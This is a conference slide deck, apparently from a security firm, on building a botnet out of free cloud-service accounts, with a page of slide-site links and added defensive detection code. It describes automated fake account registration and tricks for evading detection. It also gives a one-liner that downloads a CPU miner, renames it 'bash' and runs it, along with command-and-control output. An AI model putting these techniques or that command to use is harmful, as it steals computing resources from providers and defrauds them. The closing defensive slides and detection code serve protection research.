CloudBots:
Harvesting Crypto Coins
Like a Botnet Farmer
2014 August 6
2
…and Violating Terms of Service
Building a Botnet with Free Cloud-based Services
3
Main Topics
•  Could we build a botnet from freely available cloud
services?
•  Will we see the rise of more cloud based botnets?
•  Should insufficient anti-automation be considered a
top ten vulnerability?
What are these guys talking about?
Overview
4
Platform as a Service
Cloud PaaS
5
Platform as a Service
Free Cloud Services
<Insert with other providers later>
Reference: http://goo.gl/AZ4nYp
6
Development Environment as a Service
Free Cloud Services
AUTOMATION
Scripting the Cloud
8
Automating Registration
•  Hurdles
-  Email address confirmation
-  CAPTCHA
-  Phone/SMS
-  Credit Card
Usability vs Security
Cloud Providers (In)Security
9
Anti-Automation
Fraudulent Account Registration
[Chart: More Anti-Automation / Email Confirmation Only; values shown: 66%, 33%; legend: Email, CAPTCHA, Credit Card, Phone]
10
Anti-Automation Techniques
•  Email address confirmation
•  CAPTCHA
•  Phone/SMS
•  Credit Card
Usability vs Security
Cloud Providers (In)Security
11
12
Automated email
processing
-  Wildcard localpart
*@domain.com
-  Extract important information
from incoming emails
-  Grep for confirmation token
links and request them
Account registration
-  Automatic request sent to
account activation links
SMTP Services
Email Confirmation Token Processing
local-part@domain.tld
Email Address Anatomy
14
Using the Google AppEngine InboundMailHandler
- first.last.001@cloudbotmail.appspotmail.com
- first.last.002@cloudbotmail.appspotmail.com
- first.last.003@cloudbotmail.appspotmail.com
- first.last.004@cloudbotmail.appspotmail.com
- first.last.005@cloudbotmail.appspotmail.com
- first.last.006@cloudbotmail.appspotmail.com
- first.last.007@cloudbotmail.appspotmail.com
- first.last.008@cloudbotmail.appspotmail.com
- first.last.009@cloudbotmail.appspotmail.com
- first.last.010@cloudbotmail.appspotmail.com
Google App Engine
Detection issues
15
Unlimited usernames
-  Prevent pattern recognition
-  Pull from real world examples
[local-part from dump]@domain.tld
Realistic Randomness
Real Email Addresses
16
Unlimited domains
-  freedns.afraid.org
-  Prevent detection
-  Thousands of unique email
domains
SMTP Services
Plethora of Email Addresses
17
Unlimited email addresses
Free DNS Subdomains
18
What do we need?
•  Free email relay
-  Free MX registration
•  Process wildcards
-  *@domain.tld
•  Send unlimited messages
-  Unrestricted SMTP to HTTP POST/JSON requests
Free Signups
Receiving Email and Processing
19
Inbound Mail As A Service
Free Cloud Services
<Insert with other providers later>
Reference: http://goo.gl/yqoh6U
20
Automated email
processing
-  Extract important information
from incoming emails
-  Grep for confirmation token
links and request them
Account registration
-  Automatic request sent to
account activation links
SMTP Services
Email Confirmation Token Processing
Reference: http://bishopfox.github.io/anti-anti-automation/
21
<Insert wall of
random email
addresses>
Realistic Randomness
Unique Email Addresses
Avoid Pattern Recognition
DEMONSTRATION
Automatic Account Creation
23
Automated Registration Workflow
Email Addresses
24
MongoDB
•  MongoLab
•  MongoHQ
Keeping track of all accounts
Storing Account Information
FUNTIVITIES
Botnets Are Fun!
26
What can we do?
•  Distributed Network Scanning
•  Distributed Password Cracking
•  DDoS
•  Click-fraud
•  Crypto Currency Mining
•  Data Storage
Now we have a botnet! Fun!
Botnet Activities
27
Refer Fake Friends
Unlimited Storage Space
28
Refer Fake Friends
Unlimited Storage Space
29
What are we using?
•  Fabric
-  Fabric is a Python library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks.
•  fab check_hosts -P -z 20
•  fab run_command
Botnet C2
Command & Control
30
Unique Amazon IP Addresses
Distributed Command
[na1.cloudbox.net:2352]: curl http://icanhazip.com
4.109.182.13
[eu1.cloudbox.net:3127]: curl http://icanhazip.com
126.34.56.254
[na1.cloudbox.net:10660]: curl http://icanhazip.com
58.251.42.128
[na1.cloudbox.net:15627]: curl http://icanhazip.com
74.216.236.72
[na1.cloudbox.net:8000]: curl http://icanhazip.com
28.228.253.19
[na1.cloudbox.net:4028]: curl http://icanhazip.com
64.216.37.252
31
Make money, money
•  Deploying miners
•  One command for $$$
All your processors are belong to us
Litecoin Mining
if [ ! -f bash ]; then wget http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi;
screen ./bash --url=stratum+tcp://pool.mine-litecoin.com --userpass=ninja.47:47; rm bash
32
Load After Crypto Currency Mining
Distributed Command
ID | Host | Status
----------------------------------------
0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51
1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00
2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38
3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95
4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41
5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52
6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33
7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38
8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45
9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38
10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
33
All your processors are belong to us
Litecoin Mining
CLOUD BREAKOUT
Bypassing Restrictions
DETECTION
No one can catch a ninja!
36
Automatic Backups
•  Propagate to other similar services
-  e.g. MongoLab <-> MongoHQ
•  Infrastructure across multiple service
providers
•  Easily migrated
Armadillo Up ™
Disaster Recovery Plan
RISING TREND
Active Attacks
38
Adaptation
Cloud Provider Registration
39
Adaptation
Cloud Provider Registration
40
Adaptation
Cloud Provider Registration
41
Crypto Coins & DDoS
Clouds Under Siege
42
Crypto Coins & DDoS
Clouds Under Siege
PROTECTION
Bot Busters
44
What can we do?
•  Logic puzzles
•  Sound output
•  Credit card validation
•  Live operators
•  Limited-use account
•  Heuristic checks
•  Federated identity systems
Usability vs Security
Protection
Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
45
What should we do?
•  Analyzing properties of Sybil
accounts
•  Analyzing the arrival rate and
distribution of accounts
•  Flag accounts registered with emails
from newly registered domain names
•  Email verification
•  CAPTCHAs
•  IP Blacklisting
•  Phone/SMS verification
•  Automatic pattern recognition
At Abuse vs At Registration
Protection
Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
46
At Abuse vs At Registration
Protection
Advanced techniques
•  Signup flow events
-  Detect common activities after signup
•  User-agent
-  A registration bot may generate a different
user-agent for each signup or use uncommon
user-agents
•  Form submission timing
-  A bot that doesn't mimic human behavior by
performing certain actions too quickly can be
detected
Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
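The registration-time checks listed on the two Protection slides above (arrival rate and distribution, pattern recognition, user-agent, form submission timing), combined into one scoring pass. This is an added example, not code from the talk or from Bishop Fox; the record fields, thresholds and reason names are assumptions, and the sample signups are constructed.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Assumed thresholds; tune them against your own registration baseline.
MIN_FILL_SECONDS = 3.0       # form submitted faster than a person could type
SERIES_MIN = 3               # addresses sharing one digit-stripped template
UA_CHURN_MIN = 3             # distinct user-agents seen from one source IP
BURST_MIN = 3                # signups for one email domain inside the window
BURST_WINDOW_SECONDS = 60

# Constructed sample records (documentation IP ranges, made-up user-agents).
SIGNUPS = [
    {"email": "first.last.001@cloudbotmail.appspotmail.com", "ip": "192.0.2.10",
     "user_agent": "UA-alpha/1.0", "rendered": "2014-08-06T12:00:00",
     "submitted": "2014-08-06T12:00:01"},
    {"email": "first.last.002@cloudbotmail.appspotmail.com", "ip": "192.0.2.10",
     "user_agent": "UA-beta/2.0", "rendered": "2014-08-06T12:00:05",
     "submitted": "2014-08-06T12:00:06"},
    {"email": "first.last.003@cloudbotmail.appspotmail.com", "ip": "192.0.2.10",
     "user_agent": "UA-gamma/3.0", "rendered": "2014-08-06T12:00:10",
     "submitted": "2014-08-06T12:00:11"},
    {"email": "alice.nguyen@example.org", "ip": "198.51.100.7",
     "user_agent": "UA-desktop/9.0", "rendered": "2014-08-06T12:03:00",
     "submitted": "2014-08-06T12:03:42"},
    {"email": "bob77@example.net", "ip": "203.0.113.5",
     "user_agent": "UA-desktop/9.0", "rendered": "2014-08-06T14:10:00",
     "submitted": "2014-08-06T14:10:31"},
]


def template(email):
    """Collapse digit runs so a numbered address series maps to one key."""
    local, _, domain = email.lower().rpartition("@")
    return re.sub(r"\d+", "#", local) + "@" + domain


def domain_of(email):
    return email.lower().rpartition("@")[2]


def score_signups(signups):
    """Return {email: [reason, ...]} from registration-time heuristics."""
    series = Counter(template(s["email"]) for s in signups)
    agents_by_ip = defaultdict(set)
    times_by_domain = defaultdict(list)
    for s in signups:
        agents_by_ip[s["ip"]].add(s["user_agent"])
        times_by_domain[domain_of(s["email"])].append(
            datetime.fromisoformat(s["submitted"]))

    report = {}
    for s in signups:
        reasons = []
        rendered = datetime.fromisoformat(s["rendered"])
        submitted = datetime.fromisoformat(s["submitted"])
        # Pattern recognition: many addresses differing only in a counter.
        if series[template(s["email"])] >= SERIES_MIN:
            reasons.append("numbered-localpart-series")
        # Form submission timing: rendered-to-submitted interval too short.
        if (submitted - rendered).total_seconds() < MIN_FILL_SECONDS:
            reasons.append("form-too-fast")
        # User-agent: one source presenting a different agent per signup.
        if len(agents_by_ip[s["ip"]]) >= UA_CHURN_MIN:
            reasons.append("user-agent-churn")
        # Arrival rate: signups for the same email domain close together.
        nearby = sum(
            1 for t in times_by_domain[domain_of(s["email"])]
            if abs((t - submitted).total_seconds()) <= BURST_WINDOW_SECONDS)
        if nearby >= BURST_MIN:
            reasons.append("arrival-burst")
        report[s["email"]] = reasons
    return report


def review_queue(signups, min_reasons=2):
    """Emails with at least min_reasons independent signals, sorted."""
    scored = score_signups(signups)
    return sorted(e for e, r in scored.items() if len(r) >= min_reasons)


if __name__ == "__main__":
    for email, reasons in score_signups(SIGNUPS).items():
        print(f"{email:48} {', '.join(reasons) or 'ok'}")
```

The numbered-series check only catches the naive pattern from the Detection issues slide; requiring two or more independent signals keeps the queue useful when local-parts and domains are randomized.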
THANK YOU
Oscar Salazar @tracertea
Rob Ragan @sweepthatleg
CONTACT@BISHOPFOX.COM

Boost PC performance: How more available memory can improve productivity
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

  • 1. CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
  • 2. 2 …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
  • 3. 3 Main Topics •  Could we build a botnet from freely available cloud services? •  Will we see the rise of more cloud based botnets? •  Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
  • 4. 4 Platform as a Service Cloud PaaS
  • 5. 5 Platform as a Service Free Cloud Services <Insert with other providers later> Reference: http://goo.gl/AZ4nYp
  • 6. 6 Development Environment as a Service Free Cloud Services
  • 8. 8 Automating Registration •  Hurdles -  Email address confirmation -  CAPTCHA -  Phone/SMS -  Credit Card Usability vs Security Cloud Providers (In)Security
  • 9. 9 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
  • 10. 10 Anti-Automation Techniques •  Email address confirmation •  CAPTCHA •  Phone/SMS •  Credit Card Usability vs Security Cloud Providers (In)Security
  • 11. 11
  • 12. 12 Automated email processing -  Wildcard localpart *@domain.com -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
  • 14. 14 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
  • 15. 15 Unlimited usernames -  Prevent pattern recognition -  Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
  • 16. 16 Unlimited domains -  freedns.afraid.org -  Prevent detection -  Thousands of unique email domains SMTP Services Plethora of Email Addresses
  • 18. 18 What do we need? •  Free email relay -  Free MX registration •  Process wildcards -  *@domain.tld •  Send unlimited messages -  Unrestricted SMTP to HTTP POST/JSON requests Free Signups Receiving Email and Processing
  • 19. 19 Inbound Mail As A Service Free Cloud Services <Insert with other providers later> Reference: http://goo.gl/yqoh6U
  • 20. 20 Automated email processing -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
  • 21. 21 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
  • 24. 24 MongoDB •  MongoLab •  MongoHQ Keeping track of all accounts Storing Account Information
  • 26. 26 What can we do? •  Distributed Network Scanning •  Distributed Password Cracking •  DDoS •  Click-fraud •  Crypto Currency Mining •  Data Storage Now we have a botnet! Fun! Botnet Activities
  • 29. 29 What are we using? •  Fabric -  Fabric is a Python library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks. •  fab check_hosts -P -z 20 •  fab run_command Botnet C2 Command & Control
  • 30. 30 Unique Amazon IP Addresses Distributed Command
      [na1.cloudbox.net:2352]: curl http://icanhazip.com
      4.109.182.13
      [eu1.cloudbox.net:3127]: curl http://icanhazip.com
      126.34.56.254
      [na1.cloudbox.net:10660]: curl http://icanhazip.com
      58.251.42.128
      [na1.cloudbox.net:15627]: curl http://icanhazip.com
      74.216.236.72
      [na1.cloudbox.net:8000]: curl http://icanhazip.com
      28.228.253.19
      [na1.cloudbox.net:4028]: curl http://icanhazip.com
      64.216.37.252
  • 31. 31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining
      if [ ! -f bash ]; then wget http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash --url=stratum+tcp://pool.mine-litecoin.com --userpass=ninja.47:47; rm bash
  • 32. 32 Load After Crypto Currency Mining Distributed Command
      ID | Host                   | Status
      ----------------------------------------
      0  | na1.cloudbox.net:1678  | 2 users, load average: 37.08, 37.60, 32.51
      1  | na1.cloudbox.net:15121 | 1 user, load average: 16.35, 15.35, 12.00
      2  | na1.cloudbox.net:11631 | 1 user, load average: 19.65, 18.46, 14.38
      3  | na1.cloudbox.net:4358  | 2 users, load average: 23.10, 22.91, 18.95
      4  | na1.cloudbox.net:1212  | 1 user, load average: 19.60, 18.47, 14.41
      5  | na1.cloudbox.net:5841  | 1 user, load average: 19.97, 18.61, 14.52
      6  | eu1.cloudbox.net:3025  | 1 user, load average: 19.27, 18.37, 14.33
      7  | eu1.cloudbox.net:6892  | 2 users, load average: 19.65, 18.46, 14.38
      8  | eu1.cloudbox.net:2038  | 1 user, load average: 18.85, 17.43, 13.45
      9  | na1.cloudbox.net:5235  | 1 user, load average: 18.55, 17.32, 13.38
      10 | na1.cloudbox.net:1122  | 1 user, load average: 26.04, 25.57, 20.02
  • 33. 33 All your processors are belong to us Litecoin Mining
  • 35. DETECTION No one can catch a ninja!
  • 36. 36 Automatic Backups •  Propagate to other similar services -  e.g. MongoLab <-> MongoHQ •  Infrastructure across multiple service providers •  Easily migrated Armadillo Up ™ Disaster Recovery Plan
  • 41. 41 Crypto Coins & DDoS Clouds Under Siege
  • 42. 42 Crypto Coins & DDoS Clouds Under Siege
  • 44. 44 What can we do? •  Logic puzzles •  Sound output •  Credit card validation •  Live operators •  Limited-use account •  Heuristic checks •  Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
  • 45. 45 What should we do? •  Analyzing properties of Sybil accounts •  Analyzing the arrival rate and distribution of accounts •  Flag accounts registered with emails from newly registered domain names •  Email verification •  CAPTCHAs •  IP Blacklisting •  Phone/SMS verification •  Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 46. 46 At Abuse vs At Registration Protection Advanced techniques •  Signup flow events -  Detect common activities after signup •  User-agent -  A registration bot may generate a different user-agent for each signup or use uncommon user-agents •  Form submission timing -  A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 47. THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM
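
The registration-time signals from slides 45 and 46 (arrival rate, newly registered domains, user-agent, form submission timing) and the numbered-address pattern shown on slide 14 can be combined into one scoring pass over signup records. This is an added example, not code from the presentation; the sample records, field layout, reason names and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample signups (not real data): time (s), email, source IP,
# user-agent, seconds spent on the form, and domain age in days
# (assumed to come from a separate WHOIS/RDAP lookup).
SIGNUPS = [
    (0,   "first.last.001@mail.example", "198.51.100.7", "UA-a", 0.4, 3),
    (5,   "first.last.002@mail.example", "198.51.100.7", "UA-b", 0.5, 3),
    (9,   "first.last.003@mail.example", "198.51.100.7", "UA-c", 0.3, 3),
    (400, "alice@corp.example", "203.0.113.20", "UA-a", 41.0, 2900),
    (900, "bob77@corp.example", "203.0.113.45", "UA-a", 27.5, 2900),
]

WINDOW_S, BURST, MIN_FILL_S, MIN_DOMAIN_AGE_D = 60, 3, 2.0, 30  # assumed thresholds

def template(email):
    """Collapse digit runs so first.last.001 and first.last.002 share a key."""
    local, _, domain = email.lower().partition("@")
    return re.sub(r"\d+", "#", local) + "@" + domain

def score_signups(signups):
    """Return {email: sorted list of reasons} for signups that trip a heuristic."""
    by_template, uas_by_ip = defaultdict(list), defaultdict(set)
    for ts, email, ip, ua, _, _ in signups:
        by_template[template(email)].append(ts)
        uas_by_ip[ip].add(ua)
    flags = {}
    for ts, email, ip, ua, fill_s, age_d in signups:
        reasons = set()
        times = by_template[template(email)]
        # Arrival rate: count same-template signups within WINDOW_S of this one.
        if sum(1 for t in times if abs(t - ts) <= WINDOW_S) >= BURST:
            reasons.add("burst_of_patterned_addresses")
        if fill_s < MIN_FILL_S:
            reasons.add("form_submitted_too_fast")
        if age_d < MIN_DOMAIN_AGE_D:
            reasons.add("newly_registered_domain")
        if len(uas_by_ip[ip]) >= BURST:
            reasons.add("user_agent_rotation_from_one_ip")
        if reasons:
            flags[email] = sorted(reasons)
    return flags

if __name__ == "__main__":
    for email, reasons in score_signups(SIGNUPS).items():
        print(email, reasons)
```

Addresses with realistic, non-numbered local-parts (slide 15) do not share a template, so the timing, domain-age and user-agent checks are the ones that still apply to them.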